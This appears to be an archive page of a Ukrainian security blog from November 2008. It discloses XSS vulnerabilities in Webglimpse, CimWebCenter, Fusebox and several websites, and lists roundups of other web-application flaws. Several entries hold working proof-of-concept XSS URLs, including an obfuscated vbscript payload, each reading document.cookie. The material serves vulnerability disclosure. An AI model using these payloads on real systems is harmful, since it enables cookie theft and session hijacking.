Архів для категорії 'Уразливості'

XSS уразливості в Webglimpse

23:58 19.11.2008

Сьогодні, після попередніх уразливостей Webglimpse, я знайшов нові Cross-Site Scripting уразливості в локальній пошуковій системі Webglimpse. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.

XSS (IE):

Уразливості в webglimpse.cgi в параметрах case, whole, lines, errors, age, filter і wordspan.

http://site/cgibin/webglimpse.cgi?ID=1&query=12345&case=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&whole=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&lines=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&errors=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&age=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&filter=%22style%3D%22background-image:url(vbscript:eval(chr(97)%2Bchr(108)%2Bchr(101)%2Bchr(114)%2Bchr(116)%2Bchr(40)%2Bchr(100)%2Bchr(111)%2Bchr(99)%2Bchr(117)%2Bchr(109)%2Bchr(101)%2Bchr(110)%2Bchr(116)%2Bchr(46)%2Bchr(99)%2Bchr(111)%2Bchr(111)%2Bchr(107)%2Bchr(105)%2Bchr(101)%2Bchr(41)))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&wordspan=%22style%3D%22xss:expression(alert(document.cookie))

Уразливі Webglimpse 2.18.7 та попередні версії.

Уразливість на board.i.ua

19:23 19.11.2008

13.05.2008

У жовтні, 18.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://board.i.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів i.ua я писав про уразливість на blog.i.ua.

Детальна інформація про уразливість з’явиться пізніше.

19.11.2008

XSS:

XSS в DOM при кліку на “aвторизироваться”.

Дана уразливість вже виправлена.

Добірка уразливостей

16:28 18.11.2008

В даній добірці уразливості в веб додатках:

  • Sciurus Hosting Panel Code Injection (деталі)
  • Ruby on Rails: Multiple vulnerabilities (деталі)
  • WBR3404TX Broadband Router XSS (деталі)
  • Sciurus Hosting Panel Code Injection (деталі)
  • Myspace Clone Script (index.php) Remote File Inclusion Vulnerability (деталі)
  • Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability (деталі)
  • net-finity (links.php) Remote SQL Injection Vulnerability (деталі)
  • JiRos Upload Manager SQL Injection (деталі)
  • ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection (деталі)
  • Persistent XSS on Aruba 800 Mobility Controller’s login page (деталі)

Уразливості в Webglimpse

23:57 17.11.2008

Сьогодні я знайшов Cross-Site Scripting уразливості в Webglimpse. Це локальна пошукова система. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.

XSS (IE):

Уразливості в webglimpse.cgi в параметрах autosyntax і autonegate.

http://site/webglimpse.cgi?ID=1&query=12345&autosyntax=%22style%3D%22xss:expression(alert(document.cookie))

http://site/webglimpse.cgi?ID=1&query=12345&autonegate=%22style%3D%22xss:expression(alert(document.cookie))

Уразливі Webglimpse 2.18.7 та попередні версії.

Уразливості на mylivepage.com

19:23 17.11.2008

10.05.2008

У жовтні, 15.10.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://mylivepage.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

17.11.2008

XSS:

Insufficient Anti-automation:

Уразливість була в капчі на сторінці http://en.mylivepage.com /register/index (зараз http://en.mylivepage.com/signup/). Що була вразлива до MustLive CAPTCHA bypass method. Цю капчу замінили на нову.

Дані уразливості вже виправлені.

Добірка уразливостей

16:18 15.11.2008

В даній добірці уразливості в веб додатках:

  • Konqueror Remote Denial Of Service (деталі)
  • 0day0day0day0day AURACMS XSS!! LATEST VERSION!!! 0day0day0day0day (деталі)
  • WebEx GPCContainer Memory Access Violation (деталі)
  • ExoPHPdesk user profile XSS / profile SQL injection (деталі)
  • VTLS.web.gateway cgi is vulnerable to XSS (деталі)
  • AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service (деталі)
  • CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability (деталі)
  • Javamail login username and password same email problem (деталі)
  • XSS on Liferay Portal Enterprise 4.1.1 login page (’login’ parameter) (деталі)
  • Aida-Web Information Exposure (деталі)

Нові уразливості в CimWebCenter

23:50 14.11.2008

Ще 26.06.2006, після того як я знайшов попередні уразливості в CimWebCenter, я знайшов нові Cross-Site Scripting уразливості в системі CimWebCenter. Одну з дірок виявив на офіційному сайті системи http://cimwebcenter.com, а також перевірив її та знайшов іншу дірку ще на двох сайтах на даній CMS.

XSS:

http://site/forum/?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/feeds?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі CimWebCenter 4.0 та попередні версії.

Уразливість на www.shelfari.com

21:12 14.11.2008

25.10.2007

Нещодавно, 19.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.shelfari.com (соціальний сервіс). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

14.11.2008

Уразливість була в коді Google Analytics.

XSS:

Дана уразливість вже виправлена.

Добірка уразливостей

17:39 13.11.2008

В даній добірці уразливості в веб додатках:

Уразливість в Fusebox Framework

23:55 12.11.2008

У січні, 20.01.2008, я знайшов Cross-Site Scripting уразливість в системі Fusebox Framework. Про що найближчим часом сповіщу розробників системи.

XSS:

POST запит на сторінці http://site
<script>alert(document.cookie)</script>В полі: Search.

Уразливі потенційно всі версії Fusebox Framework.

Уразливість знайшов на офіційному сайті движка http://www.fusebox.org. Зараз уразливість на сайті не працює, тому що адміни поставили WAF dotDefender (в якому я також знаходив дірки, про що напишу окремо). Що не є оптимальним вибором, коли замість виправлення дірок ховаються за ВАФами. І після того як WAF буде обійдено, уразливості знову починають працювати.